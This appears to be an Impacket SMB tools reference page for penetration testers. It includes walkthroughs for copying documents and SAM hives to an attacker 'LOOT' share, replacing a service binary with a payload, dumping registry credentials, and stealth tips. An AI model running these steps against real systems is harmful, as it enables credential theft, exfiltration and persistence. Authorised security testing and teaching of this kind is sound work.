Skip to main content
Impacket provides extensive SMB (Server Message Block) functionality for file access, registry operations, and Windows service management.

File & Share Access

smbclient.py

Interactive SMB client for browsing shares and transferring files. 
# Connect with password
smbclient.py DOMAIN/user:password@target

# With NTLM hash
smbclient.py DOMAIN/user@target -hashes LMHASH:NTHASH

# Kerberos authentication
smbclient.py DOMAIN/user@target -k -no-pass -dc-ip DC_IP

# Anonymous login
smbclient.py @target -no-pass

Shell Commands

# Download file
get filename.txt
get C:\Windows\System32\config\SAM

# Upload file
put /local/path/file.exe
put payload.exe C:\Windows\Temp\payload.exe

# Create directory
mkdir NewFolder

# Remove file
rm file.txt

# Remove directory
rmdir FolderName

# View file info
info filename.txt

# Read file contents (text files)
cat file.txt

# View file with pager
more file.txt

# Change local directory
lcd /tmp

# Execute local shell command
!ls -la
!pwd

# Exit
exit
quit

Example Session

$ smbclient.py CORP/[email protected] -hashes :8846f7eaee8fb117ad06bdd830b7586c
Impacket v0.12.0 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
Shared

# use C$
# ls
drw-rw-rw-          0  Mon Jan  1 00:00:00 2024 .
drw-rw-rw-          0  Mon Jan  1 00:00:00 2024 ..
drw-rw-rw-          0  Wed Dec 20 10:30:22 2023 Program Files
drw-rw-rw-          0  Wed Dec 20 10:30:22 2023 Windows
drw-rw-rw-          0  Thu Jan 11 15:45:33 2024 Users

# cd Windows\Temp
# put payload.exe
# ls
-rw-rw-rw-      73802  Thu Jan 15 14:22:11 2024 payload.exe

# exit

smbserver.py

Create a local SMB server for file transfers and attacks. 
# Share current directory
smbserver.py SHARE .

# Share specific directory
smbserver.py SHARE /path/to/share

# From Windows target:
# net use \\attacker-ip\SHARE
# copy file.txt \\attacker-ip\SHARE\file.txt

smbserver.py Use Cases

# On attacker machine:
smbserver.py LOOT /tmp/loot -smb2support

# On compromised Windows system:
net use \\10.0.0.100\LOOT
copy C:\Users\Admin\Documents\*.docx \\10.0.0.100\LOOT\
reg save HKLM\SAM \\10.0.0.100\LOOT\sam.save

Registry Operations

reg.py

Remote registry access and manipulation. 
# Query registry key
reg.py DOMAIN/user:password@target query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# With hash
reg.py DOMAIN/user@target -hashes :NTHASH query -keyName HKLM\\SYSTEM\\CurrentControlSet\\Services

registry-read.py

Read registry keys and values remotely. 
# Read specific key
registry-read.py DOMAIN/user:password@target -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Enumerate subkeys
registry-read.py DOMAIN/user:pass@target -keyName HKLM\\SYSTEM\\CurrentControlSet\\Services

regsecrets.py

Extract secrets from saved registry hives (offline). 
# Extract from saved hives
regsecrets.py -sam sam.save -system system.save -security security.save

# Output SAM hashes, LSA secrets, cached credentials

Service Management

services.py

Manage Windows services remotely. 
# List all services
services.py DOMAIN/user:password@target list

# Filter by status
services.py DOMAIN/user:pass@target list | grep -i running

Example Service Manipulation

# 1. List services to find target
services.py CORP/admin:pass@target list

# 2. Stop service
services.py CORP/admin:pass@target stop -name VulnService

# 3. Upload malicious binary
smbclient.py CORP/admin:pass@target
# use C$
# put payload.exe Windows\System32\VulnService.exe

# 4. Restart service
services.py CORP/admin:pass@target start -name VulnService

Specialized SMB Tools

smbmap

While not part of Impacket, it’s worth mentioning for enumeration: 
# List shares (external tool - for reference)
smbmap -H target -u user -p password
smbmap -H target -u user -H HASH

attrib.py

Manage file attributes via SMB. 
# Get file attributes
attrib.py DOMAIN/user:password@target -file "C:\\path\\to\\file.txt"

# Set attributes
attrib.py DOMAIN/user:pass@target -file "C:\\file.txt" -attr +h +s +r
# +h = hidden, +s = system, +r = readonly

ntfs-read.py

Direct NTFS filesystem access (requires raw disk access). 
# Read NTFS volume
ntfs-read.py DOMAIN/user:password@target -volume C:

# Extract specific file
ntfs-read.py DOMAIN/user:pass@target -volume C: -file "\\Windows\\System32\\config\\SAM"

Attack Scenarios

# 1. Save registry hives
reg.py CORP/admin:pass@target save -keyName HKLM\\SAM sam.save
reg.py CORP/admin:pass@target save -keyName HKLM\\SYSTEM system.save
reg.py CORP/admin:pass@target save -keyName HKLM\\SECURITY security.save

# 2. Download hives
smbclient.py CORP/admin:pass@target
# use C$
# cd Windows\Temp
# get sam.save
# get system.save
# get security.save

# 3. Extract credentials offline
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

# 4. Clean up
smbclient.py CORP/admin:pass@target
# use C$
# cd Windows\Temp
# rm sam.save
# rm system.save
# rm security.save

Network Utilities

sniffer.py / sniff.py

Capture network traffic (requires raw socket access). 
# Sniff network traffic
sniffer.py -i eth0

# Filter specific protocols
sniff.py -i eth0 -filter "tcp port 445"

ping.py / ping6.py

ICMP ping implementations. 
# IPv4 ping
ping.py target

# IPv6 ping
ping6.py target-ipv6

getArch.py

Detect target system architecture. 
# Detect if target is 32-bit or 64-bit
getArch.py DOMAIN/user:password@target

# Useful before uploading payloads
getArch.py CORP/admin:[email protected]

machine_role.py

Determine machine role (workstation, server, DC). 
# Identify machine role
machine_role.py DOMAIN/user:password@target

# Output: Workstation, Server, or Domain Controller

Common Issues & Solutions

# Verify credentials work
crackmapexec smb target -u user -p password

# Check share permissions
smbmap -H target -u user -p password

# Try different shares
smbclient.py user:pass@target
> shares
> use ADMIN$  # Requires admin
> use C$      # Requires admin
> use IPC$    # Usually accessible

# SMBv1 disabled (Windows 10+/Server 2016+)
# Ensure tools use SMB2/3:
smbserver.py SHARE /path -smb2support

# Check SMB version with nmap
nmap -p445 --script smb-protocols target

# Force SMB2
smbclient.py user:pass@target -smb2

# Ensure RemoteRegistry service is running
services.py domain/user:pass@target start -name RemoteRegistry

# Verify admin privileges
crackmapexec smb target -u user -p pass --local-auth

# Use alternative methods
secretsdump.py domain/user:pass@target -use-vss

# Check available disk space
smbclient.py user:pass@target
> use C$
> ls

# Try different share
> use D$

# Use smaller chunks (for large files)
# Split file first:
split -b 10M largefile.bin chunk_

# Upload chunks
> put chunk_aa
> put chunk_ab

# Reassemble on target
> !cmd /c copy /b chunk_* largefile.bin

Best Practices

Stealth

  • Avoid multiple failed auth attempts
  • Use legitimate-looking service names
  • Clean up uploaded files after use
  • Restore original registry values

Reliability

  • Verify file transfers completed
  • Test commands before automation
  • Handle errors gracefully
  • Keep logs for troubleshooting

Security

  • Use Kerberos when possible
  • Encrypt sensitive file transfers
  • Securely delete extracted data
  • Don’t leave backdoors accessible

Documentation

  • Record all modifications made
  • Document created services/files
  • Note original configurations
  • Maintain cleanup checklist

Next Steps

Remote Execution

Execute commands after accessing shares

Credential Dumping

Extract credentials via registry access

LDAP Operations

Enumerate Active Directory objects

Build docs developers (and LLMs) love

Get started for freeTalk to us